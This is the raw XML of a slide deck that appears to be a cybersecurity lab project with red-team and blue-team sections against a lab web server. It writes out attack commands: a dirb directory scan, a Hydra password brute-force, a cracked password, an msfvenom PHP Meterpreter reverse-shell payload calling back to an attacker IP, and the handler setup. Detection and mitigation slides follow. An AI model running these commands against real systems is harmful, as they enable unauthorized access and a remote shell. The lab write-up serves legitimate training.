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Black"/>
      <p:bold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831208-58A5-4195-B2AE-05DFEAB214DB}">
  <a:tblStyle styleId="{57831208-58A5-4195-B2AE-05DFEAB214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RobotoLigh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Black-boldItalic.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold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092d2cfd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1092d2cfd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092d2cfde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092d2cfde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092d2cfde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092d2cfde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8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62.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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63.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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75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Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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81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80.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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8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9.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90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93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Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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0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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Brute Force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;113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in Kali Linux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8" name="Google Shape;1138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2" name="Google Shape;114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4" name="Google Shape;1144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Hydra with an wordlist provided us with Ashton’s password to log into the /secret_folder directory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which revealed the CEO’s password hash and directions on how to log into the /webdav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6" name="Google Shape;1146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7" name="Google Shape;114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9" name="Google Shape;1149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Syntax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-l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get 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975" y="3621450"/>
            <a:ext cx="3376699" cy="10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Hash Cracker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157" name="Google Shape;115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Crackstation.net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0" name="Google Shape;1160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1" name="Google Shape;1161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2" name="Google Shape;1162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4" name="Google Shape;1164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5" name="Google Shape;1165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6" name="Google Shape;1166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Provided the CEO’s password to gain access into the /webdav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8" name="Google Shape;1168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9" name="Google Shape;1169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0" name="Google Shape;1170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1" name="Google Shape;1171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linux4u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3" name="Google Shape;117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825" y="3115301"/>
            <a:ext cx="3399901" cy="13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Reverse Shell Payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Google Shape;1179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MSFvenom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2" name="Google Shape;1182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83" name="Google Shape;1183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4" name="Google Shape;1184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" name="Google Shape;1185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6" name="Google Shape;1186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7" name="Google Shape;1187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Allowed me to create a reverse shell payload to be uploaded into /webdav of the target machine.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0" name="Google Shape;1190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91" name="Google Shape;1191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2" name="Google Shape;1192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3" name="Google Shape;1193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Syntax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Msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.90 LPORT=4444 -f raw &gt; photo.php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5" name="Google Shape;11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25" y="3202175"/>
            <a:ext cx="2558299" cy="15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Listener</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Google Shape;120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MSFconsole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4" name="Google Shape;1204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05" name="Google Shape;1205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6" name="Google Shape;1206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6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08" name="Google Shape;1208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9" name="Google Shape;1209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" name="Google Shape;1210;p6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Created a listener and gained backdoor access after the payload in /webdav was executed.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2" name="Google Shape;1212;p6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13" name="Google Shape;1213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14" name="Google Shape;1214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5" name="Google Shape;1215;p6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6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Syntax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‘use exploit/multi/handler’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‘set payload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php/meterpreter_reverse_tcp’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‘set LHOST=192.168.1.90’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‘set LPORT 4444’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‘run’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7" name="Google Shape;12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553" y="4191700"/>
            <a:ext cx="2171747" cy="33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67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4" name="Google Shape;1224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30" name="Google Shape;1230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31" name="Google Shape;123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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338875" y="63690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port scan occurred at approximately 0300 hrs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123,194 packets sent from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Because so many packets were sent in seconds, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>indicates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> a port scan occurred.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1234" name="Google Shape;12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75" y="8646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770824"/>
            <a:ext cx="8409298" cy="165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1" name="Google Shape;1241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42" name="Google Shape;124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69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="427525" y="18062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4" name="Google Shape;1244;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397950" y="82492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 occurred at approximately 0300 hrs. 10,143 requests were made.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/company_folders/secret_folder was requested. It contained instruction to access the /webdav</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1245" name="Google Shape;12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50" y="9728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25" y="1806200"/>
            <a:ext cx="8499000" cy="25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2" name="Google Shape;1252;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167200" y="617550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53" name="Google Shape;1253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0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5" name="Google Shape;1255;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338975" y="767100"/>
            <a:ext cx="5791200" cy="970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30,252 hits were made in this attack.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 successful attempt of the 30,252 hits.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1256" name="Google Shape;12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25" y="8744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67"/>
            <a:ext cx="8409301" cy="1665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600" y="3091251"/>
            <a:ext cx="8551048" cy="17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4" name="Google Shape;1264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1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6" name="Google Shape;1266;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288700" y="796600"/>
            <a:ext cx="5791200" cy="968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94 hits to this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>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shell payload photo.php was requested.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1267" name="Google Shape;12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90710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8409299" cy="35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2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81" name="Google Shape;128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73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an alarm that detects NMAP scans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unknown IP scanning our ports</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Google Shape;1283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Keep your firewall up to date.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IDS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> Detection System such as SNORT.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89" name="Google Shape;128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IDS can notify the team if there was unauthorized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attempt from an unknown IP address.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1291" name="Google Shape;1291;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4476625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Block all traffic and create a white list of approved IP’s.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Geo-Blocking from outside areas.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97" name="Google Shape;1297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increase of abnormal traffic from a IP source.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increase of 401 HTTP responses occurring.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10 or more failed login attempts.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100 or more hits from a single IP </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1299" name="Google Shape;1299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whitelist of authorized IP’s.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Two-Factor Authentication password rule.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Lockout accounts after 10 failed attempts.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305" name="Google Shape;1305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unauthorized IP address accessing the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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>single</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> unauthorized IP address attempting to gain access.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307" name="Google Shape;1307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Restrict access to a few authorized IP addresses.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Two-Factor Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> rule.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Remove any sensitive information on the public facing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13" name="Google Shape;1313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Notify when a file was uploaded by an unauthorized IP.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Whenever a file is uploaded by an unauthorized IP.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1315" name="Google Shape;1315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Close ports and to unauthorized IP’s.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program such as TXHunter that can periodically check for malicious traffic such as metasploitable.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95700" y="9350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192.168.1.90/24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Azure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625" y="1036900"/>
            <a:ext cx="4538700" cy="36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{57831208-58A5-4195-B2AE-05DFEAB214DB}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 Based Network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VM used to exploit vulnerabilities in a target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VM used to monitor and analyze logs using Kibana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{57831208-58A5-4195-B2AE-05DFEAB214DB}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Scanning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Scanning for vulnerable open ports on the victim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Reveals which ports are opened to gain unauthorized access.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Hidden Directory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Found a vulnerability to gain access to the hidden /secret_folder directory.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the attacker to gain access to the companies sensitive material.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Hydra to brute force an employees password.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access to an employees login to the company.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Meterpreter Reverse TCP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Connect back to attacker and spawn a Meterpreter server (PHP)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the attacker to have backdoor access to the company website.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DIRB for WebDav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DIRB in Kali Linux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DIRB on the target site revealed a hidden directory that requires a login and password to access (/webdav)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Syntax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dirb http://192.168.1.105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725" y="2676700"/>
            <a:ext cx="2591947" cy="20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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113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Reviewing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companies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website, we find that employee Ashton revealed a hidden directory which required a login and password.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URL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http://192.168.1.105/company_folders/secret_folder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9" name="Google Shape;11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513" y="3444450"/>
            <a:ext cx="3642888" cy="11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